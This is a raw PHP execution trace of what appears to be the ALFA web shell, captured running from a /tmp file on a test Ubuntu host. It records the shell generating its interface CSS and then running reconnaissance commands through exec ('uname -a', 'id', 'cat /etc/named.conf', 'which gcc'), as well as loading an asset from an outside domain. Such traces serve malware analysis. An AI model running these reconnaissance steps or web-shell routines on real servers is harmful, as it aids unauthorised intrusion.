6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['input[type=submit]:hover' => 'box-shadow:0 0 4px {color};border:2px solid {color};', '.button:hover,#addup:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	235	1	0.013588	438352
6	235	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	236	0	0.013612	438352	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'box-shadow:0 0 4px {color};border:2px solid {color};'
6	236	1	0.013629	438528
6	236	R			'box-shadow:0 0 4px #27979B;border:2px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #27979B;border:2px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'input[type=submit]:hover{box-shadow:0 0 4px #27979B;border:2px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.button:hover,#addup:hover'
6	237	0	0.013692	438888	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'button:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['input[type=submit]:hover' => 'box-shadow:0 0 4px {color};border:2px solid {color};', '.button:hover,#addup:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	237	1	0.013731	438888
6	237	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	238	0	0.013756	438888	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'box-shadow:0 0 4px {color};border:1px solid {color};'
6	238	1	0.013773	439064
6	238	R			'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.button:hover,#addup:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'outputs_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.ml1'
6	239	0	0.013841	438888	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'outputs_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#67ABDF', 'multi_selector' => ['.ml1' => 'color: {color};']]
6	239	1	0.013871	438888
6	239	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#67ABDF'
6	240	0	0.013896	438888	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#67ABDF'	'color: {color};'
6	240	1	0.013912	439024
6	240	R			'color: #67ABDF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #67ABDF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.ml1{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'outputs_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.ml1'
6	241	0	0.013971	438848	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'outputs_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.ml1' => 'border: 1px solid {color};']]
6	241	1	0.014002	438848
6	241	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	242	0	0.014026	438848	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border: 1px solid {color};'
6	242	1	0.014042	439000
6	242	R			'border: 1px solid #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 1px solid #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.ml1{border: 1px solid #0E304A;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.inputfile'
6	243	0	0.014105	438864	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.inputfile' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	243	1	0.014137	438864
6	243	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	244	0	0.014161	438864	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'box-shadow:0 0 4px {color};border:1px solid {color};'
6	244	1	0.014178	439040
6	244	R			'box-shadow:0 0 4px #0E304A;border:1px solid #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #0E304A;border:1px solid #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.inputfile{box-shadow:0 0 4px #0E304A;border:1px solid #0E304A;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader_background'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.inputfile strong'
6	245	0	0.014287	438888	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader_background'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.inputfile strong' => 'background-color: {color};']]
6	245	1	0.014320	438888
6	245	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	246	0	0.014345	438888	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'background-color: {color};'
6	246	1	0.014362	439040
6	246	R			'background-color: #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.inputfile strong{background-color: #0E304A;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader_text_right'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.inputfile strong'
6	247	0	0.014426	438864	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader_text_right'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.inputfile strong' => 'color: {color};']]
6	247	1	0.014457	438864
6	247	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	248	0	0.014482	438864	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	248	1	0.014498	439000
6	248	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.inputfile strong{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader_text_left'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.inputfile span'
6	249	0	0.014558	438848	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader_text_left'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#25ff00', 'multi_selector' => ['.inputfile span' => 'color: {color};']]
6	249	1	0.014589	438848
6	249	R			'#25ff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#25ff00'
6	250	0	0.014613	438848	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#25ff00'	'color: {color};'
6	250	1	0.014629	438984
6	250	R			'color: #25ff00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #25ff00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.inputfile span{color: #25ff00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.inputfile:hover'
6	251	0	0.014690	438848	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['.inputfile:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	251	1	0.014723	438848
6	251	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	252	0	0.014747	438848	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'box-shadow:0 0 4px {color};border:1px solid {color};'
6	252	1	0.014764	439024
6	252	R			'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader_progress_bar'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.up_bar'
6	253	0	0.014833	438888	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader_progress_bar'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#00ff00', 'multi_selector' => ['.up_bar' => 'background-color: {color};']]
6	253	1	0.014868	438888
6	253	R			'#00ff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#00ff00'
6	254	0	0.014892	438888	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#00ff00'	'background-color: {color};'
6	254	1	0.014909	439040
6	254	R			'background-color: #00ff00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #00ff00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.up_bar{background-color: #00ff00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'mysql_tables'
6	255	0	0.014961	438864	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'mysql_tables'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	255	1	0.014986	438864
6	255	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.mysql_tables{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'mysql_table_count'
6	256	0	0.015033	438864	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'mysql_table_count'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
6	256	1	0.015058	438864
6	256	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.mysql_table_count{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'copyright'
6	257	0	0.015107	438864	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'copyright'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#dfff00'
6	257	1	0.015131	438864
6	257	R			'#dfff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#dfff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.copyright{color: #dfff00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'scrollbar'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '*::-webkit-scrollbar-thumb'
6	258	0	0.015191	438864	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'scrollbar'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#1e82b5', 'multi_selector' => ['*::-webkit-scrollbar-thumb' => 'background-color: {color};']]
6	258	1	0.015222	438864
6	258	R			'#1e82b5'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#1e82b5'
6	259	0	0.015246	438864	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#1e82b5'	'background-color: {color};'
6	259	1	0.015262	439016
6	259	R			'background-color: #1e82b5;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #1e82b5;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '*::-webkit-scrollbar-thumb{background-color: #1e82b5;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'scrollbar_background'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '*::-webkit-scrollbar-track'
6	260	0	0.015329	439888	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'scrollbar_background'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#000115', 'multi_selector' => ['*::-webkit-scrollbar-track' => 'background-color: {color};']]
6	260	1	0.015361	439888
6	260	R			'#000115'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#000115'
6	261	0	0.015385	439888	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#000115'	'background-color: {color};'
6	261	1	0.015401	440040
6	261	R			'background-color: #000115;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #000115;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '*::-webkit-scrollbar-track{background-color: #000115;}'
5	130	1	0.015447	439832
5	130	R			'.header{border: 7px solid #0E304A}#meunlist{border-color: #0E304A}#hidden_sh{background-color: #0E304A}.ajaxarea{border: 1px solid #0E304A}.foot{border-color: #0E304A}.header_vars{color: #27979B;}.header_values{color: #67ABDF;}.header_on{color: #00FF00;}.header_off{color: #ff0000;}.header_none{color: #00FF00;}.home_shell{color: #ff0000;}.home_shell:hover{color: #FFFFFF;}.back_shell{color: #efbe73;}.back_shell:hover{color: #FFFFFF;}.header_pwd{color: #00FF00;}.header_pwd:hover{color: #FFFFFF;}.header_drive{c'
5	262	0	0.015678	423448	htmlspecialchars	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1073	1	'/var/www/html/uploads/'
5	262	1	0.015695	423640
5	262	R			'/var/www/html/uploads/'
5	263	0	0.015711	423560	htmlspecialchars	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1074	1	'FilesMan2'
5	263	1	0.015725	423752
5	263	R			'FilesMan2'
5	264	0	0.015739	423608	htmlspecialchars	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1075	1	'Windows-1251'
5	264	1	0.015753	423800
5	264	R			'Windows-1251'
5	265	0	0.016491	435736	__showicon	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1086	1	'loader'
5	265	1	0.016508	435736
5	265	R			'http://solevisible.com/images/loader.svg'
5	266	0	0.016526	435736	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1087	4	'uname -a'	FALSE	FALSE	???
6	267	0	0.016542	435736	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'uname -a'	FALSE
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
7	268	0	0.016568	435736	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
7	268	1	0.016582	435776
7	268	R			TRUE
7	269	0	0.016596	435760	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'uname -a'	''
7	269	1	0.020636	436520
7	269	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
7	270	0	0.020682	436296	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux']
7	270	1	0.020705	436360
7	270	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
6	267	1	0.020746	435896
6	267	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
5	266	1	0.020784	435896
5	266	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1087	$cmd_uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
5	271	0	0.020820	435896	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1088	1	'php_uname'
5	271	1	0.020836	435936
5	271	R			TRUE
5	272	0	0.020850	435896	php_uname	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1088	0
5	272	1	0.020865	436008
5	272	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
5	273	0	0.020884	436008	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1088	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	120
5	273	1	0.020902	436104
5	273	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1088	$uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	$s = 1
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
5	274	0	0.021045	437288	phpversion	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1116	0
5	274	1	0.021058	437352
5	274	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
5	275	0	0.021078	437800	date	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1124	1	'Y-m-d H:i:s'
5	275	1	0.021151	440152
5	275	R			'2023-02-12 21:10:04'
5	276	0	0.021176	438072	_alfa_file	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1130	2	'/etc/named.conf'	FALSE
6	277	0	0.021192	438072	file	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2507	1	'/etc/named.conf'
6	277	1	0.021221	438224
6	277	R			FALSE
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2507	$array = FALSE
6	278	0	0.021248	438184	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2509	4	'id'	FALSE	FALSE	???
7	279	0	0.021263	438184	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'id'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	280	0	0.021288	438184	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	280	1	0.021301	438224
8	280	R			TRUE
8	281	0	0.021314	438208	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'id'	''
8	281	1	0.022974	438808
8	281	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
8	282	0	0.023022	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => 'uid=33(www-data) gid=33(www-data) groups=33(www-data)']
8	282	1	0.023043	438728
8	282	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
7	279	1	0.023075	438264
7	279	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
6	278	1	0.023105	438264
6	278	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
6	283	0	0.023124	438184	addslashes	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2510	1	'/etc/named.conf'
6	283	1	0.023139	438216
6	283	R			'/etc/named.conf'
6	284	0	0.023155	438232	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2510	4	'cat "/etc/named.conf"'	FALSE	FALSE	???
7	285	0	0.023171	438232	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'cat "/etc/named.conf"'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	286	0	0.023198	438232	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	286	1	0.023212	438272
8	286	R			TRUE
8	287	0	0.023226	438256	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'cat "/etc/named.conf"'	''
8	287	1	0.024538	438376
8	287	R			''
8	288	0	0.024573	438312	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	288	1	0.024590	438376
8	288	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	285	1	0.024618	438232
7	285	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	284	1	0.024643	438232
6	284	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2510	$data = ''
5	276	1	0.024669	438184
5	276	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1130	$d0mains = FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1131	GLOBALS['need_to_update_header'] = 'true'
5	289	0	0.024711	438184	alfaSize	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1146	1	232015802368
6	290	0	0.024727	438184	sprintf	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2411	2	'%1.2f'	216.08155441284
6	290	1	0.024744	438568
6	290	R			'216.08'
5	289	1	0.024758	438224
5	289	R			'216.08 GB'
5	291	0	0.024773	438408	alfaSize	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1146	1	198978609152
6	292	0	0.024793	438408	sprintf	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2411	2	'%1.2f'	185.31327056885
6	292	1	0.024808	438792
6	292	R			'185.31'
5	291	1	0.024821	438448
5	291	R			'185.31 GB'
5	293	0	0.024839	438184	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1150	1	'safe_mode'
5	293	1	0.024854	438216
5	293	R			FALSE
5	294	0	0.024867	438184	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1151	4	'id'	FALSE	FALSE	???
6	295	0	0.024882	438184	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'id'	FALSE
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
7	296	0	0.024906	438184	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
7	296	1	0.024920	438224
7	296	R			TRUE
7	297	0	0.024933	438208	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'id'	''
7	297	1	0.026422	438808
7	297	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
7	298	0	0.026451	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => 'uid=33(www-data) gid=33(www-data) groups=33(www-data)']
7	298	1	0.026470	438728
7	298	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
6	295	1	0.026501	438264
6	295	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
5	294	1	0.026530	438264
5	294	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1154	$x = 0
5	299	0	0.026559	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'gcc'
6	300	0	0.026573	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which gcc'	FALSE	FALSE	???
7	301	0	0.026589	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which gcc'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	302	0	0.026614	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	302	1	0.026628	438264
8	302	R			TRUE
8	303	0	0.026641	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which gcc'	''
8	303	1	0.028081	438768
8	303	R			'/usr/bin/gcc'
8	304	0	0.028106	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/gcc']
8	304	1	0.028124	438728
8	304	R			'/usr/bin/gcc'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/gcc'
7	301	1	0.028152	438264
7	301	R			'/usr/bin/gcc'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/gcc'
6	300	1	0.028178	438264
6	300	R			'/usr/bin/gcc'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/gcc'
5	299	1	0.028204	438184
5	299	R			12
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
